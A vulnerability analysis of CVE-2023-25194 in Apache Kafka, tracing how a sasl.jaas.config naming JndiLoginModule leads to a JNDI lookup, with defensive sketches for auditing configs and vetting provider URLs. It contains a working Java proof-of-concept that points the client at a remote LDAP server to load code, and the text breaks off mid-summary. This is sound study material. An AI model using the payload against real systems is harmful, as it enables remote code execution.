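I. Introduction to Kafka

Kafka was originally developed at LinkedIn. It is a distributed messaging system that supports partitions and multiple replicas and has traditionally relied on ZooKeeper for coordination. Its defining strength is processing large volumes of data in real time, which suits scenarios such as Hadoop-based batch processing, low-latency real-time systems, Storm/Spark stream processing engines, web/nginx logs, access logs, and message services. Kafka is written in Scala and Java. LinkedIn open-sourced it in 2011 and donated it to the Apache Software Foundation, where it became a top-level project.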

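Vulnerability overview

Kafka is an open-source stream processing platform maintained by the Apache Software Foundation and written in Scala and Java. The project aims to provide a unified, high-throughput, low-latency platform for handling real-time data. Its persistence layer is essentially a "massively scalable publish/subscribe message queue designed as a distributed transaction log", which makes it highly valuable as enterprise infrastructure for processing streaming data.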

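The vulnerability (tracked as CVE-2023-25194) allows the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute Java deserialization gadget chains on the Kafka Connect server. When gadgets are present on the classpath, the attacker can trigger unrestricted deserialization of untrusted data or remote code execution (RCE).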

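Exploitation has a prerequisite: the attacker needs access to a Kafka Connect worker and must be able to create or modify connectors on it with an arbitrary Kafka client SASL JAAS configuration and a SASL-based security protocol. This has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. When configuring a connector through the Kafka Connect REST API, an authenticated operator can set the sasl.jaas.config property of any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule". This can be done through the "producer.override.sasl.jaas.config", "consumer.override.sasl.jaas.config", or "admin.override.sasl.jaas.config" properties.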
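On the defensive side, the three override properties above give a concrete thing to look for in connector configurations. The following is a minimal sketch, assuming the connector configuration has already been loaded into a `Map<String, String>`; the class name `ConnectorConfigAudit` and the method `findSuspiciousKeys` are hypothetical and not part of Kafka.

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Map;

public class ConnectorConfigAudit {
    // Login module named in the prerequisite description above
    static final String JNDI_MODULE = "com.sun.security.auth.module.JndiLoginModule";

    /**
     * Returns, in sorted order, every config key ending in "sasl.jaas.config"
     * whose value references JndiLoginModule. This covers the producer.override,
     * consumer.override and admin.override variants as well as the plain key.
     */
    public static List<String> findSuspiciousKeys(Map<String, String> connectorConfig) {
        List<String> hits = new ArrayList<>();
        for (Map.Entry<String, String> e : connectorConfig.entrySet()) {
            String key = e.getKey();
            String value = e.getValue();
            if (key != null && value != null
                    && key.endsWith("sasl.jaas.config")
                    && value.contains(JNDI_MODULE)) {
                hits.add(key);
            }
        }
        Collections.sort(hits);
        return hits;
    }
}
```

A plain substring match is deliberately simple; it flags the module name wherever it appears in the JAAS string and makes no attempt to parse the JAAS grammar.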

Affected versions

Apache Kafka 2.3.0 - 3.3.2
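The affected range can be checked mechanically. The sketch below assumes plain dotted version strings such as "3.3.0" (a trailing qualifier like "-SNAPSHOT" on a component is stripped); `AffectedVersionCheck` and `isAffected` are hypothetical names used only for illustration.

```java
public class AffectedVersionCheck {
    private static final int[] FIRST_AFFECTED = {2, 3, 0};
    private static final int[] LAST_AFFECTED = {3, 3, 2};

    /** Parses "major.minor.patch" into three ints; missing components count as 0. */
    static int[] parse(String version) {
        String[] parts = version.trim().split("\\.");
        int[] out = new int[3];
        for (int i = 0; i < 3; i++) {
            if (i < parts.length) {
                // Drop anything after the leading digits, e.g. "2-SNAPSHOT" -> "2"
                String digits = parts[i].replaceAll("[^0-9].*$", "");
                out[i] = Integer.parseInt(digits);
            }
        }
        return out;
    }

    /** Lexicographic comparison of two parsed versions. */
    static int compare(int[] a, int[] b) {
        for (int i = 0; i < 3; i++) {
            if (a[i] != b[i]) {
                return Integer.compare(a[i], b[i]);
            }
        }
        return 0;
    }

    /** True when the version lies in the range 2.3.0 - 3.3.2 stated above. */
    public static boolean isAffected(String version) {
        int[] v = parse(version);
        return compare(v, FIRST_AFFECTED) >= 0 && compare(v, LAST_AFFECTED) <= 0;
    }
}
```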

II. Vulnerability analysis

Dependency

    <dependency>
        <groupId>org.apache.kafka</groupId>
        <artifactId>kafka-clients</artifactId>
        <version>3.3.0</version>
    </dependency>



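Payload

    import java.util.Properties;
    import org.apache.kafka.clients.producer.KafkaProducer;

    public class Main {
        public static void main(String[] args) {
            // Allow remote codebases for LDAP object factories (disabled by default on modern JDKs)
            System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
            Properties props = new Properties();
            props.put("security.protocol", "SASL_SSL");
            // user.provider.url points at the LDAP server used in the test environment
            props.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule " +
                    "required user.provider.url=\"ldap://192.168.0.104:1389/Basic/Command/calc\" " +
                    "useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " +
                    "group.provider.url=\"xxx\";");
            props.put("bootstrap.servers", "localhost:9092");
            props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
            props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
            // Constructing the producer is enough to reach the JAAS login code path
            new KafkaProducer<>(props);
        }
    }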

Analysis: stepping through the methods in a debugger

org.apache.kafka.clients.producer.KafkaProducer constructors

    // Constructor 1
    public KafkaProducer(Map<String, Object> configs, Serializer<K> keySerializer, Serializer<V> valueSerializer) {
        this(new ProducerConfig(ProducerConfig.appendSerializerToConfig(configs, keySerializer, valueSerializer)),
                keySerializer, valueSerializer, (ProducerMetadata)null, (KafkaClient)null, (ProducerInterceptors)null, Time.SYSTEM);
    }

    // Constructor 2
    public KafkaProducer(Properties properties) {
        this((Properties)properties, (Serializer)null, (Serializer)null);
    }

    // Constructor 3
    public KafkaProducer(Properties properties, Serializer<K> keySerializer, Serializer<V> valueSerializer) {
        this(Utils.propsToMap(properties), keySerializer, valueSerializer);
    }

    // Constructor 4 (package-private)
    KafkaProducer(ProducerConfig config, Serializer<K> keySerializer, Serializer<V> valueSerializer,
                  ProducerMetadata metadata, KafkaClient kafkaClient, ProducerInterceptors<K, V> interceptors, Time time) {
        try {
            this.producerConfig = config;
            this.time = time;
            String transactionalId = config.getString("transactional.id");
            this.clientId = config.getString("client.id");
            LogContext logContext;
            if (transactionalId == null) {
                logContext = new LogContext(String.format("[Producer clientId=%s] ", this.clientId));
            } else {
                logContext = new LogContext(String.format("[Producer clientId=%s, transactionalId=%s] ", this.clientId, transactionalId));
            }
            // ... (metrics, serializer, interceptor and metadata setup omitted)
            this.errors = this.metrics.sensor("errors");
            // newSender() builds the network client and, with it, the SASL channel builder
            this.sender = this.newSender(logContext, kafkaClient, this.metadata);
            String ioThreadName = "kafka-producer-network-thread | " + this.clientId;
            this.ioThread = new KafkaThread(ioThreadName, this.sender, true);
            this.ioThread.start();
            AppInfoParser.registerAppInfo("kafka.producer", this.clientId, this.metrics, time.milliseconds());
            this.log.debug("Kafka producer started");
        } catch (Throwable var24) {
            this.close(Duration.ofMillis(0L), true);
            throw new KafkaException("Failed to construct kafka producer", var24);
        }
    }

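Execution enters through the public constructors, which delegate to one another (the Properties overloads convert their argument and call the Map overload, constructor 1).

The delegation ends at constructor 4, the package-private constructor that calls newSender().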

org.apache.kafka.clients.producer.KafkaProducer#newSender()

    Sender newSender(LogContext logContext, KafkaClient kafkaClient, ProducerMetadata metadata) {
        int maxInflightRequests = this.producerConfig.getInt("max.in.flight.requests.per.connection");
        int requestTimeoutMs = this.producerConfig.getInt("request.timeout.ms");
        // The channel builder is where security.protocol and the JAAS settings are evaluated
        ChannelBuilder channelBuilder = ClientUtils.createChannelBuilder(this.producerConfig, this.time, logContext);
        ProducerMetrics metricsRegistry = new ProducerMetrics(this.metrics);
        Sensor throttleTimeSensor = Sender.throttleTimeSensor(metricsRegistry.senderMetrics);
        KafkaClient client = kafkaClient != null ? kafkaClient : new NetworkClient(
                new Selector(this.producerConfig.getLong("connections.max.idle.ms"), this.metrics, this.time,
                        "producer", channelBuilder, logContext),
                metadata, this.clientId, maxInflightRequests,
                this.producerConfig.getLong("reconnect.backoff.ms"),
                this.producerConfig.getLong("reconnect.backoff.max.ms"),
                this.producerConfig.getInt("send.buffer.bytes"),
                this.producerConfig.getInt("receive.buffer.bytes"),
                requestTimeoutMs,
                this.producerConfig.getLong("socket.connection.setup.timeout.ms"),
                this.producerConfig.getLong("socket.connection.setup.timeout.max.ms"),
                this.time, true, this.apiVersions, throttleTimeSensor, logContext);
        short acks = Short.parseShort(this.producerConfig.getString("acks"));
        return new Sender(logContext, (KafkaClient)client, metadata, this.accumulator, maxInflightRequests == 1,
                this.producerConfig.getInt("max.request.size"), acks, this.producerConfig.getInt("retries"),
                metricsRegistry.senderMetrics, this.time, requestTimeoutMs,
                this.producerConfig.getLong("retry.backoff.ms"), this.transactionManager, this.apiVersions);
    }

org.apache.kafka.clients.ClientUtils#createChannelBuilder()

    public static ChannelBuilder createChannelBuilder(AbstractConfig config, Time time, LogContext logContext) {
        SecurityProtocol securityProtocol = SecurityProtocol.forName(config.getString("security.protocol"));
        String clientSaslMechanism = config.getString("sasl.mechanism");
        return ChannelBuilders.clientChannelBuilder(securityProtocol, Type.CLIENT, config, (ListenerName)null,
                clientSaslMechanism, time, true, logContext);
    }

org.apache.kafka.common.network.ChannelBuilders#clientChannelBuilder()

    public static ChannelBuilder clientChannelBuilder(SecurityProtocol securityProtocol, JaasContext.Type contextType,
            AbstractConfig config, ListenerName listenerName, String clientSaslMechanism, Time time,
            boolean saslHandshakeRequestEnable, LogContext logContext) {
        if (securityProtocol == SecurityProtocol.SASL_PLAINTEXT || securityProtocol == SecurityProtocol.SASL_SSL) {
            if (contextType == null) {
                throw new IllegalArgumentException("`contextType` must be non-null if `securityProtocol` is `" + securityProtocol + "`");
            }
            if (clientSaslMechanism == null) {
                throw new IllegalArgumentException("`clientSaslMechanism` must be non-null in client mode if `securityProtocol` is `" + securityProtocol + "`");
            }
        }
        return create(securityProtocol, Mode.CLIENT, contextType, config, listenerName, false, clientSaslMechanism,
                saslHandshakeRequestEnable, (CredentialCache)null, (DelegationTokenCache)null, time, logContext, (Supplier)null);
    }

org.apache.kafka.common.network.ChannelBuilders#create()

    private static ChannelBuilder create(SecurityProtocol securityProtocol, Mode mode, JaasContext.Type contextType,
            AbstractConfig config, ListenerName listenerName, boolean isInterBrokerListener, String clientSaslMechanism,
            boolean saslHandshakeRequestEnable, CredentialCache credentialCache, DelegationTokenCache tokenCache,
            Time time, LogContext logContext, Supplier<ApiVersionsResponse> apiVersionSupplier) {
        // ... (configs is derived from config and listenerName; lines omitted)
        Object channelBuilder;
        switch (securityProtocol) {
            case SSL:
                channelBuilder = new SslChannelBuilder(mode, listenerName, isInterBrokerListener, logContext);
                break;
            case SASL_SSL:
            case SASL_PLAINTEXT:
                String sslClientAuthOverride = null;
                Map<String, JaasContext> jaasContexts;
                if (mode != Mode.SERVER) {
                    // Client mode: the JAAS context is loaded from sasl.jaas.config
                    JaasContext jaasContext = contextType == Type.CLIENT
                            ? JaasContext.loadClientContext(configs)
                            : JaasContext.loadServerContext(listenerName, clientSaslMechanism, configs);
                    jaasContexts = Collections.singletonMap(clientSaslMechanism, jaasContext);
                } else {
                    // ... (server mode: one JaasContext per entry of "sasl.enabled.mechanisms",
                    //      plus the "ssl.client.auth" handling for SASL_SSL listeners; omitted)
                }
                channelBuilder = new SaslChannelBuilder(mode, (Map)jaasContexts, securityProtocol, listenerName,
                        isInterBrokerListener, clientSaslMechanism, saslHandshakeRequestEnable, credentialCache,
                        tokenCache, sslClientAuthOverride, time, logContext, apiVersionSupplier);
                break;
            case PLAINTEXT:
                channelBuilder = new PlaintextChannelBuilder(listenerName);
                break;
            default:
                throw new IllegalArgumentException("Unexpected securityProtocol " + securityProtocol);
        }
        // The builder is configured before it is returned, which leads into SaslChannelBuilder#configure()
        ((ChannelBuilder)channelBuilder).configure(configs);
        return (ChannelBuilder)channelBuilder;
    }

org.apache.kafka.common.network.SaslChannelBuilder#configure()

    public void configure(Map<String, ?> configs) throws KafkaException {
        try {
            // ... (setup omitted; var12 iterates over the entries of this.jaasContexts)
            while (var12.hasNext()) {
                Map.Entry<String, JaasContext> entry = (Map.Entry)var12.next();
                String mechanism = (String)entry.getKey();
                // A LoginManager is acquired for each configured mechanism
                LoginManager loginManager = LoginManager.acquireLoginManager((JaasContext)entry.getValue(), mechanism, defaultLoginClass, configs);
                this.loginManagers.put(mechanism, loginManager);
                Subject subject = loginManager.subject();
                this.subjects.put(mechanism, subject);
                if (this.mode == Mode.SERVER && mechanism.equals("GSSAPI")) {
                    this.maybeAddNativeGssapiCredentials(subject);
                }
            }
            if (this.securityProtocol == SecurityProtocol.SASL_SSL) {
                this.sslFactory = new SslFactory(this.mode, this.sslClientAuthOverride, this.isInterBrokerListener);
                this.sslFactory.configure(configs);
            }
        } catch (Throwable var9) {
            this.close();
            throw new KafkaException(var9);
        }
    }

org.apache.kafka.common.security.authenticator.LoginManager#acquireLoginManager()

    public static LoginManager acquireLoginManager(JaasContext jaasContext, String saslMechanism,
            Class<? extends Login> defaultLoginClass, Map<String, ?> configs) throws LoginException {
        Class<? extends Login> loginClass = configuredClassOrDefault(configs, jaasContext, saslMechanism,
                "sasl.login.class", defaultLoginClass);
        Class<? extends AuthenticateCallbackHandler> defaultLoginCallbackHandlerClass = "OAUTHBEARER".equals(saslMechanism)
                ? OAuthBearerUnsecuredLoginCallbackHandler.class
                : AbstractLogin.DefaultLoginCallbackHandler.class;
        Class<? extends AuthenticateCallbackHandler> loginCallbackClass = configuredClassOrDefault(configs, jaasContext,
                saslMechanism, "sasl.login.callback.handler.class", defaultLoginCallbackHandlerClass);
        synchronized (LoginManager.class) {
            LoginManager loginManager;
            LoginMetadata loginMetadata;
            Password jaasConfigValue = jaasContext.dynamicJaasConfig();
            if (jaasConfigValue != null) {
                // sasl.jaas.config was supplied in the client properties (the case exercised by the payload)
                loginMetadata = new LoginMetadata(jaasConfigValue, loginClass, loginCallbackClass);
                loginManager = (LoginManager)DYNAMIC_INSTANCES.get(loginMetadata);
                if (loginManager == null) {
                    loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
                    DYNAMIC_INSTANCES.put(loginMetadata, loginManager);
                }
            } else {
                loginMetadata = new LoginMetadata(jaasContext.name(), loginClass, loginCallbackClass);
                loginManager = (LoginManager)STATIC_INSTANCES.get(loginMetadata);
                if (loginManager == null) {
                    loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
                    STATIC_INSTANCES.put(loginMetadata, loginManager);
                }
            }
            // ...
            return loginManager.acquire();
        }
    }

org.apache.kafka.common.security.authenticator.LoginManager constructor

    private LoginManager(JaasContext jaasContext, String saslMechanism, Map<String, ?> configs,
            LoginMetadata<?> loginMetadata) throws LoginException {
        this.loginMetadata = loginMetadata;
        this.login = (Login)Utils.newInstance(loginMetadata.loginClass);
        this.loginCallbackHandler = (AuthenticateCallbackHandler)Utils.newInstance(loginMetadata.loginCallbackClass);
        this.loginCallbackHandler.configure(configs, saslMechanism, jaasContext.configurationEntries());
        this.login.configure(configs, jaasContext.name(), jaasContext.configuration(), this.loginCallbackHandler);
        // The login is performed immediately, inside the constructor
        this.login.login();
    }

org.apache.kafka.common.security.kerberos.KerberosLogin#login()

    public LoginContext login() throws LoginException {
        this.lastLogin = this.currentElapsedTime();
        // Delegates to AbstractLogin#login()
        this.loginContext = super.login();
        this.subject = this.loginContext.getSubject();
        this.isKrbTicket = !this.subject.getPrivateCredentials(KerberosTicket.class).isEmpty();
        AppConfigurationEntry[] entries = this.configuration().getAppConfigurationEntry(this.contextName());
        if (entries.length == 0) {
            this.isUsingTicketCache = false;
            this.principal = null;
        } else {
            // ... (remainder of the method omitted)
        }
        // ...
    }

org.apache.kafka.common.security.authenticator.AbstractLogin#login()

    public LoginContext login() throws LoginException {
        this.loginContext = new LoginContext(this.contextName, (Subject)null, this.loginCallbackHandler, this.configuration);
        this.loginContext.login();
        log.info("Successfully logged in.");
        return this.loginContext;
    }

javax.security.auth.login.LoginContext#login()

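    public void login() throws LoginException {
        loginSucceeded = false;
        if (subject == null) {
            subject = new Subject();
        }
        try {
            // The modules are invoked inside doPrivileged
            invokePriv(LOGIN_METHOD);
            invokePriv(COMMIT_METHOD);
            loginSucceeded = true;
        } catch (LoginException le) {
            try {
                invokePriv(ABORT_METHOD);
            } catch (LoginException le2) {
                throw le;
            }
            throw le;
        }
    }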

javax.security.auth.login.LoginContext#invokePriv()

    private void invokePriv(final String methodName) throws LoginException {
        try {
            java.security.AccessController.doPrivileged(
                new java.security.PrivilegedExceptionAction<Void>() {
                    public Void run() throws LoginException {
                        invoke(methodName);
                        return null;
                    }
                }, creatorAcc);
        } catch (java.security.PrivilegedActionException pae) {
            throw (LoginException)pae.getException();
        }
    }

javax.security.auth.login.LoginContext#invoke()

    private void invoke(String methodName) throws LoginException {
        for (int i = moduleIndex; i < moduleStack.length; i++, moduleIndex++) {
            try {
                int mIndex = 0;
                Method[] methods = null;
                if (moduleStack[i].module != null) {
                    methods = moduleStack[i].module.getClass().getMethods();
                } else {
                    // Instantiate the LoginModule named in the JAAS configuration via reflection
                    Class<?> c = Class.forName(moduleStack[i].entry.getLoginModuleName(), true, contextClassLoader);
                    Constructor<?> constructor = c.getConstructor(PARAMS);
                    Object[] args = { };
                    moduleStack[i].module = constructor.newInstance(args);
                    methods = moduleStack[i].module.getClass().getMethods();
                    // Locate and call the module's initialize method
                    for (mIndex = 0; mIndex < methods.length; mIndex++) {
                        if (methods[mIndex].getName().equals(INIT_METHOD)) {
                            break;
                        }
                    }
                    Object[] initArgs = {subject, callbackHandler, state, moduleStack[i].entry.getOptions()};
                    methods[mIndex].invoke(moduleStack[i].module, initArgs);
                }
                // Locate the requested method (here "login") on the module
                for (mIndex = 0; mIndex < methods.length; mIndex++) {
                    if (methods[mIndex].getName().equals(methodName)) {
                        break;
                    }
                }
                Object[] args = { };
                // Invoke it: this is the call into JndiLoginModule#login()
                boolean status = ((Boolean)methods[mIndex].invoke(moduleStack[i].module, args)).booleanValue();
                if (status == true) {
                    // ... (SUFFICIENT / success bookkeeping omitted)
                } else {
                    // ... (module result ignored)
                }
            } catch (NoSuchMethodException nsme) {
                // ... (error reporting omitted)
            }
            // ... (catch blocks for InstantiationException, ClassNotFoundException, IllegalAccessException
            //      and InvocationTargetException, including REQUISITE / REQUIRED / OPTIONAL failure handling, omitted)
        }
        // ... (final evaluation of firstRequiredError / firstError / success omitted)
    }
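The key behaviour in invoke() is that the login module class is chosen purely by the name in the JAAS configuration and then instantiated and driven reflectively. The following sketch illustrates that dispatch with a harmless stand-in module. `JaasDispatchDemo`, `RecordingLoginModule` and `runLogin` are hypothetical names, the URL is a placeholder, and nothing here performs a JNDI lookup or any network access.

```java
import java.util.HashMap;
import java.util.Map;
import javax.security.auth.Subject;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.login.AppConfigurationEntry;
import javax.security.auth.login.Configuration;
import javax.security.auth.login.LoginContext;
import javax.security.auth.login.LoginException;
import javax.security.auth.spi.LoginModule;

public class JaasDispatchDemo {
    /** Harmless stand-in module: it only records the option it was configured with. */
    public static class RecordingLoginModule implements LoginModule {
        static volatile String lastSeenUrl;
        private Map<String, ?> options;

        @Override
        public void initialize(Subject subject, CallbackHandler handler,
                               Map<String, ?> sharedState, Map<String, ?> options) {
            this.options = options;
        }

        @Override
        public boolean login() {
            // A real JndiLoginModule would resolve this URL; here it is only stored
            lastSeenUrl = (String) options.get("user.provider.url");
            return true;
        }

        @Override public boolean commit() { return true; }
        @Override public boolean abort() { return true; }
        @Override public boolean logout() { return true; }
    }

    /** Builds an in-memory JAAS configuration naming the given module class and runs a login. */
    public static String runLogin(String moduleClassName, String providerUrl) {
        Map<String, String> options = new HashMap<>();
        options.put("user.provider.url", providerUrl);
        final AppConfigurationEntry entry = new AppConfigurationEntry(
                moduleClassName, AppConfigurationEntry.LoginModuleControlFlag.REQUIRED, options);
        Configuration config = new Configuration() {
            @Override
            public AppConfigurationEntry[] getAppConfigurationEntry(String name) {
                return new AppConfigurationEntry[] { entry };
            }
        };
        try {
            // Same constructor shape as in AbstractLogin#login(): null Subject, explicit Configuration
            new LoginContext("demo", null, null, config).login();
        } catch (LoginException e) {
            throw new IllegalStateException(e);
        }
        return RecordingLoginModule.lastSeenUrl;
    }

    public static void main(String[] args) {
        System.out.println(runLogin(RecordingLoginModule.class.getName(),
                "ldap://example.invalid/placeholder"));
    }
}
```

The caller never references `RecordingLoginModule` as a type when logging in; only its class name travels through the configuration. That is why controlling the sasl.jaas.config string is enough to select which module's login() runs.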

com.sun.security.auth.module.JndiLoginModule#login()

    public boolean login() throws LoginException {
        // userProvider must not be null
        if (userProvider == null) {
            throw new LoginException("Error: Unable to locate JNDI user provider");
        }
        if (groupProvider == null) {
            throw new LoginException("Error: Unable to locate JNDI group provider");
        }
        if (debug) {
            System.out.println("\t\t[JndiLoginModule] user provider: " + userProvider);
            System.out.println("\t\t[JndiLoginModule] group provider: " + groupProvider);
        }
        if (tryFirstPass) {
            try {
                attemptAuthentication(true);
                succeeded = true;
                if (debug) {
                    System.out.println("\t\t[JndiLoginModule] " + "tryFirstPass succeeded");
                }
                return true;
            } catch (LoginException le) {
                cleanState();
                if (debug) {
                    System.out.println("\t\t[JndiLoginModule] " + "tryFirstPass failed with:" + le.toString());
                }
            }
        } else if (useFirstPass) {
            // Branch taken by the payload, which sets useFirstPass="true"
            try {
                attemptAuthentication(true);
                succeeded = true;
                if (debug) {
                    System.out.println("\t\t[JndiLoginModule] " + "useFirstPass succeeded");
                }
                return true;
            } catch (LoginException le) {
                cleanState();
                if (debug) {
                    System.out.println("\t\t[JndiLoginModule] " + "useFirstPass failed");
                }
                throw le;
            }
        }
        try {
            attemptAuthentication(false);
            succeeded = true;
            if (debug) {
                System.out.println("\t\t[JndiLoginModule] " + "regular authentication succeeded");
            }
            return true;
        } catch (LoginException le) {
            cleanState();
            if (debug) {
                System.out.println("\t\t[JndiLoginModule] " + "regular authentication failed");
            }
            throw le;
        }
    }

com.sun.security.auth.module.JndiLoginModule#attemptAuthentication()

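    private void attemptAuthentication(boolean getPasswdFromSharedState) throws LoginException {
        String encryptedPassword = null;
        // First obtain the username and password
        getUsernamePassword(getPasswdFromSharedState);
        try {
            InitialContext iCtx = new InitialContext();
            // JNDI lookup on the configured user.provider.url: this is the injection sink
            ctx = (DirContext)iCtx.lookup(userProvider);
            SearchControls controls = new SearchControls();
            NamingEnumeration<SearchResult> ne = ctx.search("", "(uid=" + username + ")", controls);
            if (ne.hasMore()) {
                SearchResult result = ne.next();
                Attributes attributes = result.getAttributes();
                // ... (remainder of the method omitted)
            }
        }
        // ... (exception handling omitted)
    }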
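Because the provider URL flows unchanged from configuration into a JNDI lookup, one defensive idea is to vet such URLs before any code is allowed to resolve them. The sketch below is purely illustrative and is not how Kafka or the JDK handles this: `ProviderUrlGuard`, its host allowlist, and the decision to accept only the ldaps scheme are all assumptions.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

public class ProviderUrlGuard {
    private final Set<String> allowedHosts;

    /** allowedHosts: lower-case host names that provider URLs may point at (hypothetical policy). */
    public ProviderUrlGuard(Set<String> allowedHosts) {
        this.allowedHosts = allowedHosts;
    }

    /** Accepts only well-formed ldaps:// URLs whose host is on the allowlist. */
    public boolean isAllowed(String providerUrl) {
        if (providerUrl == null) {
            return false;
        }
        final URI uri;
        try {
            uri = new URI(providerUrl.trim());
        } catch (URISyntaxException e) {
            return false;
        }
        String scheme = uri.getScheme();
        String host = uri.getHost();
        if (scheme == null || host == null) {
            return false;
        }
        return scheme.equalsIgnoreCase("ldaps")
                && allowedHosts.contains(host.toLowerCase(Locale.ROOT));
    }
}
```

With an allowlist of, say, a single internal directory host, the URL from the payload above is rejected on both scheme and host, and a bare value such as "xxx" is rejected because it has no scheme at all.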

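The call chain, in the order traced above, is as follows:

    KafkaProducer.<init>
      -> KafkaProducer#newSender()
      -> ClientUtils#createChannelBuilder()
      -> ChannelBuilders#clientChannelBuilder()
      -> ChannelBuilders#create()
      -> SaslChannelBuilder#configure()
      -> LoginManager#acquireLoginManager()
      -> LoginManager.<init>
      -> KerberosLogin#login()
      -> AbstractLogin#login()
      -> LoginContext#login()
      -> LoginContext#invokePriv()
      -> LoginContext#invoke()
      -> JndiLoginModule#login()
      -> JndiLoginModule#attemptAuthentication()
      -> InitialContext#lookup()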

In summary, JNDI injection requires the following conditions to be met:

    // security.protocol is SASL_SSL or SASL_PLAINTEXT